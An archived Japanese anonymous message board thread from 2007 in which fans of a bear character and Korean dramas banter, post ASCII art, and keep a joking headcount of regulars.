470 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 07:59:26
亀スマソ
>>446
いるよー
だってクマーヲタだもんw
>>448
バーカバーカタソはいないのか・・・

471 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 11:18:48
いる
安売りはしない バーカバーカ

472 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 12:07:07
>>471
>安売りはしない
キャーかっこええーー!!
さすがクマヲタ界のツンデレカリスマww
お元気そうで何よりっす

住人点呼中間集計(改々々々)
ここのクマー  1匹
ヒグマー(ヲタ兼) 3匹(ニセタソ含)
ワグマー(ヲタ兼) 1匹
コクマー      1匹
バーカバーカタソ 1匹

473 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 14:46:26
遅れたけどただのクマーヲタです

474 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 18:17:12
さり気にヲタ増えてる
モテモテだぬ、クマーw

475 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 21:56:34
クマー勘違いしてない?
ビョンがカリアゲキャラだよw

476 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 22:47:31

       〇__〇   
       (,,・(エ)・)  
      ( O┬O           
  ≡ ◎-ヽJ┴◎     

477 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 00:10:45
〇__〇    なぞなぞー
(・(エ)・)  ミンジはヨンスさんをWベッドに入れてくれなかったの?

478 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 00:53:04
つまんないからシーフードヌードルをたーべよっとw

479 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 01:01:04
待て!それは危険だ

480 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 01:08:53
出会うのが遅すぎたなり
もう6割は胃の中に納まったなりorz
雑も過疎だねー

481 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 01:23:06
ごめんよニセ・・・orz

482 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 01:34:50
おもしろが浮かばないからねんねかな

483 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 02:43:32
遅れた!
ワグマー(ヲタ兼) もう1匹追加ヨロ〜

484 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 08:31:03
>>481
ん?呼んだ?
ごめんって何だ?
何も被害にあってないぞ!?

485 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 14:49:55
○ヲタってまとまってて裏山だな〜w

486 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 14:55:35
まとまって来てるの?w

487 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 14:58:45
違うよ
避難所w
元うちのヲタのような気もするがw
昔と似てるw

488 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 15:29:16
そーゆうのもあるのかー?w<うちの→〇

489 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 16:11:46
多分、想像してる人と違うとおもw

490 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 16:49:22
ふたり該当者が居るw
でもどっちにしてもさw


491 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 17:52:52
集まってる人数の多い方でつよ
漏れが言ってる人かどうかわからないけどw

492 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 22:40:45
>>485-491
謎めいてる会話だわw
ミンチョル中の人ヲタじゃないよね?

493 :壁に耳あり、障子にメアリーさん:2007/01/19(金) 23:38:37
住人点呼中間集計(改々々々々)

ここのクマー  1匹
ヒグマー(ヲタ兼) 3匹(ニセタソ含)
ワグマー(ヲタ兼) 2匹
コクマー      1匹
バーカバーカタソ 1匹
純クマーヲタ  1匹

精鋭約10匹・・・
オフ会するにはちょうどいい人数かw

100 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)